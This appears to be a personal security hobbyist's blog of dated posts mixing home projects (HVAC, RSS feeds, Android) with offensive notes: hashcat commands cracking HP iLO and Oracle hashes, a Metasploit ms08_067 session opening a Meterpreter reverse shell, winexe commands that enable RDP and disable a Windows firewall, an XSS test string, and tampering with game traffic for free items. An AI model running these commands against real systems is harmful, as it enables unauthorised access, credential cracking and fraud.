
Security for the Masses


Linkedin Blog

JAMBOREE : USB Rubber Ducky Scripts & Payloads Python 3 Arduino

Old news

11/18/2015 - Welcome to Switzerland !

12/14/2014 - Ever wanted to create self extracting installers with ease and free ? Place this SFX folder in the same path as 7zip binary. Name your script install.bat and place all the files in the FILESFGOHERE folder and run the make_sfx.bat or use the included 7z SFX Builder . I got fed up with WinRAR and have now switched to 7zip's SFX key is using the not included 7zS.sfx file to create windows binaries SFX.zip


12/10/2014 - Fixed Cyanide Happiness Explosm.net comics only feed Cyanide_Happiness_Explosm.rss

11/09/2014 - Cat Hacking! It guarantees all food . canned, kibble, a special diet or medication goes straight to the right cat

* Styrofoam cooler flipped upside down
* Ani Mate 305 Elite Super Select Cat Door White (Cat Mate or ANI356) RFID Cat Door

10/07/2014 - Testing apps with tokens ohh my ! Macros Session Handling Burp BurpSuite Synchronizer Token Pattern Anti-CSRF (Cross-Site Request Forgery ).mp4 and faster /less traffic method Recursive_Grep_Burp_BurpSuite_Synchronizer_Token_Pattern_Anti-CSRF.mp4


So from what I can tell there is no way to extract the DLLs for flash without having administrator ...MSI just contains the EXE and %TEMP% has nothing useful in it


09/01/2014 - Bluetooth gone wild ! Got a mouse working and killed all these services.

09/01/2014 - Hacking HVAC for older units

So I needed to replace my old Thermostat and picked up a 99$ wifi one at HD. Now this is no Nest but ... for 300$ I can write my own script to do whatever...anyway lets get started.

Last time I did this was at an apartment...I managed to wireup the transformer just right to when the AC kicked on it shorted the transformer and blew it up for a big POW! This time however I wanted to get it right-ish ...

Here some comments/notes:

* you need to figure out what kind of unit you have first ( most the new thermos have support for even heat-pump systems)
* there are numerous safety switches around the unit to prevent you from getting popped ... so watch out for stupid switches on plates and light switches for C- wire etc.. mine has 3 safty cutoffs. One at the panel, one on a light switch and one at the breaker .. I mean really super safe already!
* watch for roof nails in your back and clear the area before you start/ make sure you have all the tools you need up there... ya its 100F out so you don't want ot have to go up and down the stairs 40 times like myself
* take a photo of the wires before you change anything. Note the Codes RC R Y G C for my 4 wire setup.
* newer stuff has more wires for variable fan speeds so I think that is why they have more wires. That and power for the thermostat itself is run too..err...?
* replace the filters while you are up there too. look around Cleaning Air Conditioner Coils for the big outdoor fan. Be sure its clear of junk and stuff and whutnot ...So if you have a older or cheaper AC unit you may see a 4 wire setup ( gass etc .. NOT heatpump .. )
* look around on maintenance tips like cleaning indoor and outdoor coils ,leveling ,etc
* laser temp to temp difference between intake and outlet on ac in house 16-20 degrees
* I have 3 filters so I removed the aux ones and left the main for better flow ( more filters less flow )
* $4-5k for new unit and bout $100 or so for a checkup/refill ( they say every year ... )
* delay in AC etc so wait about 5min or so and it may take a while to catchup if it has been off for a while in 100F weather ..

My setup:

model nunber: FBF100F14A3
model nunber: NTG3100GFA3

Control Board:

wiring for AC

video of my setup basically

08/29/2014 - Crack all ILO (HP System Managment) default hashes in <12min

So if you have ever seen a HP system it has the password on the serial number tag. It is 8char and only numbers.

# crack all ILO default hashes -12min on laptop from MSF dump IPMI hashes tool
./hashcat-cli64.exe --remove --outfile=batchcrack.out -m 7300 hashes.txt -a 3 ?d?d?d?d?d?d?d?d

Snip-it of http://rmcurdy.com/scripts/fu.txt

06/16/2014 - Android Aereo Location Hack with Fake GPS

05/15/2014 - Android + Firefox about:config with referer set to 0!

05/04/2014 - New free site uptime using UptimeRobot.com

05/04/2014 - BurpSuite / Android with ease using FS Cert Installer

04/21/2014 - Finally Adblock that actually works: Firefox Beta with Ghostery + Adblock plus on Android

03/12/2014 - Looking for errors ? Here are some Windows Log File Parsers I have been looking at SMS Tracer (tracer32.exe) and LogExpert

I could not think of any more failsause words but here is my current regex for them:


03/04/2014 - Some more Android fun on my S4 ! Linux Deploy KitKat Android Metasploit Autopwn Exploiting

03/04/2014 - ATL is 1337 !

02/11/2014 - Updated Parse Nessus binary by melcara.com parse_nessus_xml.v20.pl.exe

01/27/2014 - Ok so I broke down and fixed all the rss feeds. No more Yahoo pipes mess ...

Comics Only Feeds:

XKCD,My Extra Life,Penny Arcade,Cyanide Happiness Explosm,Dilbert,JOT Joy of Tech,CAD Ctrl+Alt+Del,User Friendly,White Ninja Comics only Feed


Updated security feeds:

fixed osvdb.org,

Also include: securityfocus,seclists,HelpNetSecurity,us-cert,kb.cert,net-security,securitytracker,darknethackers,professionalsecuritytesters,f-secure,gossamer-threads,taosecurity,securityvulns,SansInstituteAtRiskAll,schneier,exploit-db


01/27/2014 - I did some Powershell FU hunting ! PowerShell_poshcode.org_scripts_ripp_details.tar.gz Anything really that starts with Powershell*

01/04/2014 - Walking in a Android Wonderland!

Cold here in Atlanta and what else to do but play with your new S4 Android phone

My setup:

* T-mobile
* S4 M919
* Gummy-2.1-12-18-13-NIGHTLY-jfltetmo.zip

Plants Vs Zombies 2 free coins DLC v2.1.5.252752 with Freedom v1.0.2 (build 102)

Pinball Arcade 1.5.0 free DLC sqlite3 database editing

11/05/2013 - For the next passive recon engagement you can use something like Shodan.com account and a 277gig (56gigs squashfs) dump of http://scan.to 's 'Critical.IO Service Fingerprints'.

More notes:


example output 'Critical.IO Service Fingerprints' :

==> /s/critical_201303_110.json <==
{ "_id" : { "ip" : "", "p" : 110, "h" : "f9c62c212b5f07a50a5326681b50404b" }, "ip" : "", "port" : 110, "proto" : "tcp", "banner" : "+OK Dovecot ready.\r\n", "geo" : { "c" : "SGP", "loc" : [ 1.366700053215027, 103.8000030517578 ] }, "name" : "pop3", "t" : { "$date" : 1362117610000 } }

==> /s/critical_201303_137.json <==
{ "_id" : { "ip" : "", "p" : 137, "h" : "7e5e3348dffb5d577cb2911284e9e61f" }, "ip" : "", "port" : 137, "proto" : "udp", "banner" : "HARON:00:U WORKGROUP:00:G HARON:20:U WORKGROUP:1e:G ", "geo" : { "c" : "RUS", "city" : "Saratov", "reg" : "67", "loc" : [ 51.54059982299805, 46.00859832763672 ] }, "name" : "netbios", "mac" : "00:53:45:00:00:00", "t" : { "$date" : 1362187777000 } }

==> /s/critical_201303_143.json <==
{ "_id" : { "ip" : "", "p" : 143, "h" : "4b011d4102f9d17a772a303969b26221" }, "ip" : "", "port" : 143, "proto" : "tcp", "banner" : "* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2011 Double Precision, Inc.  See COPYING for distribution information.\r\n", "geo" : { "c" : "IDN", "city" : "Jakarta Pusat", "reg" : "04", "loc" : [ -6.18179988861084, 106.8223037719727 ] }, "name" : "imap", "t" : { "$date" : 1362117607000 } }

==> /s/critical_201303_161.json <==
{ "_id" : { "ip" : "", "p" : 161, "h" : "6944c12cdfd52f04370d448ee19213a2" }, "ip" : "", "port" : 161, "proto" : "udp", "banner" : "TD-W8101G", "geo" : { "c" : "THA", "loc" : [ 15, 100 ] }, "name" : "snmp", "t" : { "$date" : 1362318642000 } }

==> /s/critical_201303_17185.json <==
{ "_id" : { "ip" : "", "p" : 17185, "h" : "96575231c45faca57afe5c57ce762996" }, "ip" : "", "port" : 17185, "proto" : "udp", "banner" : "vxworks=VxWorks5.5.1 cpu=41 bsp=BCM1190 A1 boot=host:apptest.bin.gz", "geo" : { "c" : "RUS", "city" : "Moscow", "reg" : "48", "loc" : [ 55.75220108032227, 37.6156005859375 ] }, "name" : "wdbrpc", "vers" : "VxWorks5.5.1", "bsp" : "BCM1190 A1", "cpu" : 41, "boot" : "host:apptest.bin.gz", "t" : { "$date" : 1362117606000 } }

==> /s/critical_201303_1900.json <==
{ "_id" : { "ip" : "", "p" : 1900, "h" : "9f0594e5f41ffd79d94011d932a7d004" }, "ip" : "", "port" : 1900, "proto" : "udp", "banner" : "Linux/2.4.22-1.2115.nptl UPnP/1.0 miniupnpd/1.0", "geo" : { "c" : "ARE", "city" : "Abu Dhabi", "reg" : "01", "loc" : [ 24.46669960021973, 54.36669921875 ] }, "name" : "upnp", "loc" : "", "t" : { "$date" : 1362144088000 } }

==> /s/critical_201303_21.json <==
{ "_id" : { "ip" : "", "p" : 21, "h" : "b510f5b81888860ef6e1341875542169" }, "ip" : "", "port" : 21, "proto" : "tcp", "banner" : "500 OOPS: cannot change directory:/mnt/usb0/\r\n", "geo" : { "c" : "CHN", "city" : "Shenyang", "reg" : "19", "loc" : [ 41.79219818115234, 123.4328002929688 ] }, "name" : "ftp", "t" : { "$date" : 1362117628000 } }

==> /s/critical_201303_22.json <==
{ "_id" : { "ip" : "", "p" : 22, "h" : "1200ae18e146c736247ca2f36fab898d" }, "ip" : "", "port" : 22, "proto" : "tcp", "banner" : "SSH-2.0-OpenSSH_5.5p1 Debian-6\r\n\\x00\\x00\\x03\\x0c\n\\x14H\\x8cR\\xc3\\xd5\\x81\\xd4\\xe9D\\xb5w\\xb4\\x9e\\xe9\\x16\\xa6\\x00\\x00\\x00~diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1\\x00\\x00\\x00\\x0fssh-rsa,ssh-dss\\x00\\x00\\x00\\x9daes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,[email protected]\\x00\\x00\\x00\\x9daes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,[email protected]\\x00\\x00\\x00ihmac-md5,hmac-sha1,[email protected],hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96\\x00\\x00\\x00ihmac-md5,hmac-sha1,[email protected],hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96\\x00\\x00\\x00\\x15none,[email protected]\\x00\\x00\\x00\\x15none,[email protected]\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00", "geo" : { "c" : "RUS", "loc" : [ 60, 100 ] }, "name" : "ssh", "t" : { "$date" : 1362117636000 } }

==> /s/critical_201303_23.json <==
{ "_id" : { "ip" : "", "p" : 23, "h" : "874a6e68681c0611523484eba35c2618" }, "ip" : "", "port" : 23, "proto" : "tcp", "banner" : "\\xff\\xfd\\x01\\xff\\xfd\\x1f\\xff\\xfd!\\xff\\xfb\\x01\\xff\\xfb\\x03\r\r\n(none) login: ", "geo" : { "c" : "CHN", "city" : "Shenyang", "reg" : "19", "loc" : [ 41.79219818115234, 123.4328002929688 ] }, "name" : "telnet", "t" : { "$date" : 1362117628000 } }

==> /s/critical_201303_25.json <==
{ "_id" : { "ip" : "", "p" : 25, "h" : "c22b6805102b553fed9d8d894e2728dc" }, "ip" : "", "port" : 25, "proto" : "tcp", "banner" : "220 mmm1766.wh.ocn.ne.jp ESMTP\r\n250-mmm1766.wh.ocn.ne.jp\r\n250-PIPELINING\r\n250-8BITMIME\r\n250 SIZE 0\r\n214 netqmail home page: http://qmail.org/netqmail\r\n221 mmm1766.wh.ocn.ne.jp\r\n", "geo" : { "c" : "JPN", "city" : "Tokyo", "reg" : "40", "loc" : [ 35.68500137329102, 139.7514038085938 ] }, "name" : "smtp", "t" : { "$date" : 1362117676000 } }

==> /s/critical_201303_3306.json <==
{ "_id" : { "ip" : "", "p" : 3306, "h" : "518692dd992c93a6c7fd2cd7954c242d" }, "ip" : "", "port" : 3306, "proto" : "tcp", "banner" : "K\\x00\\x00\\x00\\xffj\\x04Host 'scanner.critical.io' is not allowed to connect to this MySQL server", "geo" : { "c" : "CRI", "loc" : [ 10, -84 ] }, "name" : "mysql", "t" : { "$date" : 1362117600000 } }

==> /s/critical_201303_443.json <==
{ "_id" : { "ip" : "", "p" : 443, "h" : "e2a886a24b45db0c7292996d74bdf230" }, "ip" : "", "port" : 443, "proto" : "tcp", "banner" : "HTTP/1.0 400 Bad Request\r\nServer: AkamaiGHost\r\nMime-Version: 1.0\r\nContent-Type: text/html\r\nContent-Length: 192\r\nExpires: Fri, 01 Mar 2013 06:10:36 GMT\r\nDate: Fri, 01 Mar 2013 06:10:36 GMT\r\nConnection: close\r\n\r\n<HTML><HEAD>\n<TITLE>Invalid URL</TITLE>\n</HEAD><BODY>\n<H1>Invalid URL</H1>\nThe requested URL \"&#38;#47;\", is invalid.<p>\nReference&#38;#32;&#38;#35;9&#38;#46;8c2e0760&#38;#46;1362118236&#38;#46;10c124\n</BODY></HTML>\n", "geo" : { "c" : "USA", "city" : "Cambridge", "reg" : "MA", "loc" : [ 42.36259841918945, -71.08429718017578 ] }, "name" : "https", "t" : { "$date" : 1362117638000 } }

==> /s/critical_201303_5353.json <==
{ "_id" : { "ip" : "", "p" : 5353, "h" : "11d261a77e5255b558979447d439642f" }, "ip" : "", "port" : 5353, "proto" : "udp", "banner" : "_http._tcp.local. _tivo-device._tcp.local.", "geo" : { "c" : "ESP", "loc" : [ 40, -4 ] }, "name" : "mdns", "services" : [ "_http._tcp.local.", "_tivo-device._tcp.local." ], "t" : { "$date" : 1362231524000 } }

==> /s/critical_201303_53.json <==
{ "_id" : { "ip" : "", "p" : 53, "h" : "25cf4b43293bd7f44a9c3bc6d5a891f5" }, "ip" : "", "port" : 53, "proto" : "udp", "banner" : "Nominum Vantio", "geo" : { "c" : "THA", "loc" : [ 15, 100 ] }, "name" : "dns", "t" : { "$date" : 1362362374000 } }

==> /s/critical_201303_5900.json <==
{ "_id" : { "ip" : "", "p" : 5900, "h" : "6e60270830ad7a9e96fa8ecc2c49394e" }, "ip" : "", "port" : 5900, "proto" : "tcp", "banner" : "RFB 003.006\n", "geo" : { "c" : "FRA", "city" : "Paris", "reg" : "A8", "loc" : [ 48.86669921875, 2.333300113677979 ] }, "name" : "vnc", "t" : { "$date" : 1362117640000 } }

==> /s/critical_201303_8080.json <==
{ "_id" : { "ip" : "", "p" : 8080, "h" : "c3c27ec69d254ceacdbc5a044c056932" }, "ip" : "", "port" : 8080, "proto" : "tcp", "banner" : "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nCache-Control: no-cache\r\n\r\n\\x00<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\"http://www.w3.org/TR/html4/loose.dtd\"><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><Meta http-equiv=\"Pragma\" Content=\"No-cach\"><meta http-equiv=\"Window-target\" content=\"_top\"><script language=\"javascript\">if (top.location != location)top.location.href = location.href;</script><title>login</title><style type=\"text/css\">\r\n<!--\r\n\r\n.zhengwenben {font-size: 16px}\r\n.curstyle {\r\ncolor: #FFFFFF;\r\nfont-size:16px;\r\n}\r\n.alarm {color: #FF0000;\r\nfont-size: 16px;\r\n}\r\na:link {\r\ncolor: #0093A7;\r\ntext-decoration: none;\r\n}\r\na:visited {\r\ntext-decoration: none;\r\ncolor: #0093A7;\r\n}\r\na:hover {\r\ntext-decoration: underline;\r\ncolor: #0093A7;\r\n}\r\na:active {\r\ntext-decoration: none;\r\ncolor: #00FF00;\r\n}\r\n.style3 {color: #FFFFFF; font-size: 16px; font-weight: bold; }\r\nbody {\r\nmargin-left: 0px;\r\nmargin-top: 0px;\r\nmargin-right: 0px;\r\nmargin-bottom: 0px;\r\n}\r\nbody,td,th {\r\n\tfont-family: Arial, Helvetica, sans-serif;\r\n}\r\n\r\n\r\n-->\r\n</style></head><body><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr bgcolor=\"#0094A8\"><td height=\"107\" colspan=\"2\"><div align=\"center\"></div><div align=\"center\"></div><img src=\"title.gif\" width=\"999\" height=\"105\"></td></tr><tr><td width=\"178\" height=\"492\" valign=\"top\" bgcolor=\"#0094A8\"><table width=\"130\" align=\"center\" cellspacing=\"10\"><tr><td>&#38;nbsp;</td></tr><tr><td><span class=\"style3\">UserLogin</span></td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr><tr><td>&#38;nbsp;</td></tr></table></td><td width=\"821\" valign=\"top\"><table width=\"778\" height=\"38\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td>&#38;nbsp;</td><td>&#38;nbsp;</td><td width=\"663\">&#38;nbsp;</td></tr><tr><td width=\"26\">&#38;nbsp;</td><td width=\"89\"><table width=\"85\" height=\"31\"><tr><td bgcolor=\"#0093A7\"><div align=\"center\" class=\"curstyle\"><strong>UserLogin</strong></div></td></tr></table></td> <td><table height=\"31\" align=\"right\"> <tr><td><form name=languageform method=\"post\"><div align=\"right\"><a href=javascript:document.languageform.submit();>\\xd6\\xd0 \\xce\\xc4</a>&#38;nbsp;&#38;nbsp;<font color=\"0093A7\">English</font>&#38;nbsp;</div><input type=\"hidden\" name=\"language\" value=\"1\"></form></td></tr></table></tr><tr><td></td><td colspan=\"2\" bgcolor=\"#0093A7\"></td></tr></table><form name=login action=./main.htm method=post><table width=\"780\" border=\"0\" align=\"left\"><tr><td width=\"21\">&#38;nbsp;</td><td width=\"85\" class=\"zhengwenben\"><div align=\"center\">Password</div></td><td width=\"660\"><input name=\"loginPwd\" type=\"password\" size=\"15\" maxlength=\"25\" value=\"\"><input type=\"submit\" name=\"login\" value=\" Login \"></td></tr><SCRIPT language=javascript>\r\n<!--\r\n\r\ndocument.login.loginPwd.focus();\r\n\r\n//-->\r\n</SCRIPT><tr><td>&#38;nbsp;</td><td><div align=\"right\"> </div></td><td>&#38;nbsp;</td></tr></table></form></td></tr></table></body></html>", "geo" : { "c" : "KOR", "loc" : [ 37, 127.5 ] }, "name" : "http-proxy", "t" : { "$date" : 1362117600000 } }

==> /s/critical_201303_80.json <==
{ "_id" : { "ip" : "", "p" : 80, "h" : "a0dbbca9eb55d7a8e524faa2f9f4da03" }, "ip" : "", "port" : 80, "proto" : "tcp", "banner" : "HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"SmartAX\"\r\nContent-Type: text/html\r\nServer: RomPager/4.07 UPnP/1.0\r\n\r\n<html>\n<head>\n<title>Protected Object</title></head><body>\n<h1>Protected Object</h1>This object on the RomPager server is protected", "geo" : { "c" : "VNM", "city" : "Vung Tau", "reg" : "45", "loc" : [ 10.35000038146973, 107.0667037963867 ] }, "name" : "http", "t" : { "$date" : 1362117600000 } }

==> /s/critical_201303_993.json <==
{ "_id" : { "ip" : "", "p" : 993, "h" : "298c2ac4faa62cebdd7f642b09c76a34" }, "ip" : "", "port" : 993, "proto" : "tcp", "banner" : "* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE AUTH=PLAIN AUTH=LOGIN] Dovecot ready.\r\n", "geo" : null, "name" : "imaps", "t" : { "$date" : 1362117607000 } }

==> /s/critical_201303_995.json <==
{ "_id" : { "ip" : "", "p" : 995, "h" : "7c668c5111c15554b7c42f3b1ad8bd2f" }, "ip" : "", "port" : 995, "proto" : "tcp", "banner" : "+OK \r\n", "geo" : { "c" : "USA", "city" : "Chicago", "reg" : "IL", "loc" : [ 41.88249969482422, -87.64409637451172 ] }, "name" : "pop3s", "t" : { "$date" : 1362117673000 } }

09/21/2013 - Phreaknic Talk - Command Line FU and J00

09/05/2013 - MediaCoder using GPU with OpenCL !

msf exploit(ms08_067_netapi) > uname -a
[*] exec: uname -a

Linux localhost #1 PREEMPT Mon Nov 26 06:41:27 EST 2012 armv7l GNU/Linux
msf exploit(ms08_067_netapi) > nmap  --script smb-check-vulns.nse --script-args=unsafe=1 -p445  --open
[*] exec: nmap  --script smb-check-vulns.nse --script-args=unsafe=1 -p445  --open

Starting Nmap 5.00 ( http://nmap.org ) at 2013-08-17 07:22 UTC
Interesting ports on
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:A7:22:08 (VMware)

Host script results:
|  smb-check-vulns:

Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at Sat Aug 17 07:23:18 +0000 2013

07/29/2013 - Compiled parse_nessus_xml.v18.pl so it can be portable parse_nessus_xml.v18.pl.exe I had to add PIE to the end because pp PAR::Packer does not include the types use Excel::Writer::XLSX::Chart::Pie;

07/03/2013 - How can I prevent Ask.com Toolbar from being installed every time Java is updated
Reg Add "HKLM\SOFTWARE\JavaSoft" /V "SPONSORS" /D DISABLE /T reg_sz /F
Reg Add "HKLM\SOFTWARE\Wow6432Node\JavaSoft" /V "SPONSORS" /D DISABLE /T reg_sz /F

06/30/2013 - Disable Skydrive/Upload Center in Office 2013
Reg Add "HKCU\software\policies\microsoft\office\common\webintegration" /V "webintegrationenabled" /D 0 /T REG_DWORD /F
Reg Add "HKLM\software\policies\microsoft\office\common\webintegration" /V "webintegrationenabled" /D 0 /T REG_DWORD /F
Reg Add "HKCU\Software\Microsoft\Office\15.0\Common\SignIn" /V "SignInOptions" /D 3 /T REG_DWORD /F
Reg Add "HKLM\Software\Microsoft\Office\15.0\Common\SignIn" /V "SignInOptions" /D 3 /T REG_DWORD /F
del /s/q c:\MSOUC.EXE
del /s/q c:\MSOSYNC.EXE

06/18/2013 - Made sight covers from Lexan ! Once hit point blank ~400FPS/20BBs you can still see but sight is compromised but at least you are protected...

PHOTO: 06/13/2013 - So android app Android-vnc-viewer stores passwords in plain text on the database yay !
path to the database VncDatabase > CONNECTION_BEAN > PASSWORD
Here is the src:

05/18/2013 - Updated/fixed OCLHashcat batch script to include rule based attacks. I use the 18_in_1.lst 38gig wordlist batchcrack_rmccurdy.sh

05/17/2013 - SSH > FreeNX > Remote Desktop (RDP) > UltraVNC !??!??!?!???
So I recently installed UltraVNC onto my gaming desktop so I can do GPU cracking remotely using OCLHashcatPlus.  What I found out quickly was that UltraVNC by default is in VIEW only mode now.  So what now ? Ok so I can t VNC into that box but I do have SSH open on my home mythbox (Ubuntu).  So I installed FreeNX client. This basically allows for easy remote desktop on Ubuntu over SSH. You need to install the support files in Ubuntu basic guide posted here https://help.ubuntu.com/community/NomachineNX .  Once you get it setup I use the string gnome-session --session=ubuntu-2d with some luck it should login the normal desktop. In some cases I just have to play with the settings.
ScreenShot of FreeNX :

I was able to log into my Ubuntu box from the internet over SSH. So I fired up Remmina great remote access tool that supports RDP for Ubuntu.  Great guess what RDP is not enabled by default in windows 7 Humm I think I can do this over CLI but how from a linux box ??!? WinEXE to the rescue. It looks something like this.
winexe --user admin --password=OHNOESMYPASSWORDHERE  // c:\\windows\\system32\\cmd.exe

Enable RDP over command line
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Yay now I have RDP enabled ! Wait why is it not working ??!?  lets check the port .

nmap -p 3389

Starting Nmap 6.25 ( http://nmap.org ) at 2013-05-17 17:41 Eastern Daylight Time

Nmap scan report for (
Host is up (0.034s latency).
3389/tcp filtered ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds

Great filtered stupid firewall .. Ok so let s disable the firewall using winexe cmd prompt like we did when enableding RDP

netsh advfirewall set AllProfiles state off

Ok ok .. so now we are set ! all ready  to SSH > FREENX > RDP so we can change the stupid UltraVNC from viewer only mode so I can remote into the Gaming box with Vnc client and click like a PRO !

05/03/2013 - Patched katalina.sh based on karma.rc to kill networking bins,apparmor and use dhcpd and not dhcpd3 katalina_patched.sh

05/02/2013 - Stop Charter from hijacking DNS
echo 'bogus-nxdomain=' >> /etc/dnsmasq.conf
echo 'bogus-nxdomain=' >> /etc/dnsmasq.conf
echo 'bogus-nxdomain=' >> /etc/dnsmasq.conf
echo 'bogus-nxdomain=' >> /etc/dnsmasq.conf
/etc/init.d/dnsmasq restart
Basicly nslookup SOMETHINGRANDN.com and any IP you get back add to the list ..

04/22/2013 - Moved the web server to Amazon AWS EC2 go crazy china and RBN !

- rssdler + rtorrent + showrss.karmorra.info = Automatically download torrents with rtorrent and RSS feeds
    Example rssdler Config file:

[email protected]:/usr/share/rssdler042/config# cat config.txt
downloadDir = /usr/share/rssdler042/config/
workingDir = /usr/share/rssdler042/config
log = 5
logFile = /usr/share/rssdler042/config/downloads.log
verbose = 5
cookieFile = /usr/share/rssdler042/config/cookies.txt
cookieType = MozillaCookieJar
scanMins = 10
sleepTime = 2
runOnce = True
urllib = True

link = http://showrss.karmorra.info/rss.php?user_id=126337&hd=1&proper=1&namespaces=true
regExTrue = \d[^\d]+\d
regExFalse = (nrg|ccd)

download1 = .
download1True = False

Example .rtorrent.rc rtorrent file :

cat ~/.rtorrent.rc
schedule = watch_directory,5,5,load_start=/home/mythtv/downloads/complete/RTORRENT/*.torrent

session = ~/.session
upload_rate = 70
port_range = 55556-55660
directory = /home/mythtv/downloads/complete/RTORRENT/

Example loop Script:

#rm downloads.log savedstate.dat daemon.info
rssdler -r -c /usr/share/rssdler042/config/config.txt
chmod 755 *.torrent
move *.torrent /home/mythtv/downloads/complete/RTORRENT/

Example output:

[email protected]:/usr/share/rssdler042/config# rssdler -r -c /usr/share/rssdler042/config/config.txt
INFO --- RSSDler 0.4.2
DEBUG writing daemonInfo
INFO [Waking up] Mon Apr  1 18:02:45 2013
DEBUG checking working dir, maybe changing dir
INFO Scanning threads
INFO finding new downloads in thread somesite
DEBUG encoding url http://showrss.karmorra.info/rss.php?user_id=126337&hd=1&proper=1&namespaces=true
DEBUG testing cookieFile settings
DEBUG attempting to load cookie type: MozillaCookieJar
DEBUG building and installing urllib opener without cookies
DEBUG grabbing page at url http://showrss.karmorra.info/rss.php?user_id=126337&hd=1&proper=1&namespaces=true
DEBUG setting ttl
DEBUG unQuoteReQuote http://showrss.karmorra.info/r/6f4892260da9069324c94ae5d8d79a38.torrent
DEBUG already downloaded http://showrss.karmorra.info/r/6f4892260da9069324c94ae5d8d79a38.torrent
DEBUG unQuoteReQuote http://showrss.karmorra.info/r/373406b558b5c4f8710ad2d259ffa9dc.torrent
DEBUG already downloaded http://showrss.karmorra.info/r/373406b558b5c4f8710ad2d259ffa9dc.torrent
DEBUG unQuoteReQuote http://showrss.karmorra.info/r/da4397ed9df9f2475d36609c66205a26.torrent
DEBUG already downloaded http://showrss.karmorra.info/r/da4397ed9df9f2475d36609c66205a26.torrent
DEBUG unQuoteReQuote http://showrss.karmorra.info/r/e2bf65b44ac8da445b6080c15466fb9a.torrent
DEBUG already downloaded http://showrss.karmorra.info/r/e2bf65b44ac8da445b6080c15466fb9a.torrent
DEBUG unQuoteReQuote http://showrss.karmorra.info/r/15ab8999ac01fc4b7a75a9ced74e8127.torrent
DEBUG already downloaded http://showrss.karmorra.info/r/15ab8999ac01fc4b7a75a9ced74e8127.torrent
INFO Processing took 2 seconds
INFO [Complete] Mon Apr  1 18:02:48 2013


03/07/2013 - Updated yahoo pipe for comics
01/22/2013 - Updated OCLHashcat batch script to include rule based attacks. batchcrack_rmccurdy.sh
12/20/2012 - # Virtualbox vbox headless vbs script
Set WshShell = WScript.CreateObject("WScript.Shell")
obj = WshShell.Run("C:\Progra~1\Oracle\VirtualBox\VBoxHeadless.exe -s nnplus64", 0)
set WshShell = Nothing

11/26/2012 - Updated Quick with new Registry and file paths from CCleaner ! quickclean.exe
11/01/2012 wifi tether wifi tethering t-mobile exhibit II 4g
* root phone
* remove IQ* and TetheringManager2.apk
mount -o remount,rw /dev/block/mmcblk0p15 /system
rm /system/app/IQ*.apk /system/lib/libiq_*
* reboot
* install FoxFi
* set agent tag to random or something like Mozilla/5.0 (Windows NT 5.1; rv:14.0) >"'><script>alert('TMOBILEHATE')</script> 

10/30/2012 - Oracle 7-10g DES(ORACLE) Oclhashcat_plus GPU

input : F35C90763516369B:DEV_MDS:WELCOME1

cudaHashcat-plus64.exe --hash-type 3100 C:\egb\ocl\ORACLE.txt C:\egb\Dictionaries\PasswordsPro.dic C:\egb\Dictionaries\Xploitz_clean.lst

09/26/2012 - split up fu and fu ripp ... fu.txt and fu_ripp.txt. also updated masspwdumper.exe to include wce.exe (windows credential editor)

08/27/2012 - fu.txt oclHashcat-plus fu .. I know right... my fu.txt is getting out of hand.

08/19/2012 - quickkill.exe Kills all unknown processes to quickly free up memory! tested XP/Win7

07/19/2012 I'm uh Pirate !
*New Disney Pirates game I played for two days before this 'testing'
*Using DROIDPROXY ( type HTTP ) / burpesuite CA per host
*Set phone in airplane mode ( just in case it forces 3G etc )
*In Firefox downloaded generated CA and imported into phone via .adb push www.google.com.crt /excad/. ( not sure if it even matters in this case.. as the post seem to be going over HTTP !?! )
*Rooted android phone

Replaing a HTTP POST from unlocking chest I get . users request is old.:
Changing HTTP POST PostStamp numbers I get .NON VALID SIGNATURE.
Replace response from the HTTP POST from the server to 999:


I will most likely get banned shortly .. ( I was ban about 20min after ;/) . most online games ban for this type of .PUSHING. when a high level pushes or gives items/currency to low level user.

07/3/2012 - BREAKOUT This app will atempt to BREAK OUT of protected networks by using input IP,PORT as HTTP and SOCKS proxies

